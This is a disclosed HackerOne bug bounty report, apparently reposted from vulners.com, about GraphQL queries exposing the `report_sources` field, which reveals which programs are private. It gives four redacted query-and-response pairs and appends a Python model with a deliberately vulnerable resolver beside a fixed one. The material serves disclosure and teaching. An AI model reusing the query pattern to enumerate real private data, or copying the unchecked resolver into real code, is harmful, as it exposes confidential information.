HackerOne: Unauthorized user can obtain `report_sources` attribute through Team GraphQL object
News category: Security vulnerabilities
Source: vulners.com
Summary: Hi team. And Happy New Year!

Description: If I am not mistaken, then through this parameter we can define private programs with an external link. If this parameter is not empty, then the program is private. - ["HackerOne Platform"]

Steps To Reproduce
https://hackerone.com/graphql POST:

1) {"query": "query {team(handle:\"████████\"){_id,report_sources}}"}
   {"data":{"team":{"_id":"██████████","report_sources":[]}}} - not private program

2) {"query": "query {team(handle:\"███\"){_id,report_sources}}"}
   {"data":{"team":{"_id":"█████","report_sources":["HackerOne Platform"]}}} - ["HackerOne Platform"] - private program

3) {"query": "query {team(handle:\"█████████\"){_id,report_sources}}"}
   {"data":{"team":{"_id":"█████████","report_sources":["HackerOne Platform"]}}} - ["HackerOne Platform"] - private program

4) {"query": "query {team(handle:\"█████\"){_id,report_sources}}"}
   {"data":{"team":{"_id":"███","report_sources":[]}}} - not private program

Sorry, I speak English badly. I hope you understand me.

Thank you, haxta4ok00

Impact: disclosure of private programs who have external... ...
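As an added illustration, not code from the report or from HackerOne, the following hypothetical Python model shows the defect class and its fix: a resolver that returns `report_sources` to any caller who can name the team handle, beside a hardened resolver that nulls the field and records a GraphQL-style error unless the viewer is entitled to see the program. Team handles, ids and members are constructed placeholders.

```python
# Added illustration (hypothetical, not HackerOne's code) of field-level
# authorization for a GraphQL-style Team object.
from dataclasses import dataclass, field

@dataclass
class Team:
    id: str
    is_private: bool
    report_sources: list = field(default_factory=list)
    members: set = field(default_factory=set)

# Constructed sample data: handles, ids and members are placeholders.
TEAMS = {
    "public-prog": Team("t-1", False),
    "private-prog": Team("t-2", True, ["HackerOne Platform"], {"alice"}),
}

def can_view_program_fields(team, viewer):
    """Public programs are visible to everyone; private ones only to members."""
    return (not team.is_private) or (viewer in team.members)

def resolve_report_sources_vulnerable(team, viewer):
    """Ignores the viewer: anyone naming the handle gets the list, and a
    non-empty list reveals that the program is private."""
    return team.report_sources

def resolve_report_sources(team, viewer):
    """Hardened: release the field only to viewers entitled to see the program."""
    if not can_view_program_fields(team, viewer):
        raise PermissionError("unauthorized field: report_sources")
    return team.report_sources

def execute_team_query(handle, fields, viewer=None, resolver=resolve_report_sources):
    """Stand-in for `team(handle:){...}`: `_id` stays public, as in the report;
    denied fields are nulled and listed in `errors`, as a GraphQL server does."""
    team = TEAMS[handle]
    data, errors = {}, []
    for f in fields:
        if f == "_id":
            data[f] = team.id
        elif f == "report_sources":
            try:
                data[f] = resolver(team, viewer)
            except PermissionError as exc:
                data[f] = None
                errors.append({"message": str(exc), "path": ["team", f]})
    result = {"data": {"team": data}}
    if errors:
        result["errors"] = errors
    return result
```

Running the same two-field query as an anonymous viewer against the vulnerable and hardened resolvers shows the difference: the first leaks `["HackerOne Platform"]`, the second returns `null` for the field with an error entry, while public programs answer identically under both.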